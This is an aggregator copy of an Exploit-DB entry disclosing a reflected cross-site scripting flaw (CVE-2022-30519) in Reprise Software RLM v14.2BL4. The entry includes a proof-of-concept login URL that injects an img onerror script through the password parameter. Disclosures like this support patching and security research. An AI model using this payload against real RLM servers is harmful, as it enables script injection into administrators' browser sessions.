5

[webapps] Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

 1 year ago
source link: https://www.exploit-db.com/exploits/51188
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

EDB-ID:

51188

EDB Verified:

Platform:

Windows

Date:

2023-04-01

Vulnerable App:

# Exploit Title:  Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10

# Proof Of Concept: 

http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E


Best Regards.
            

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK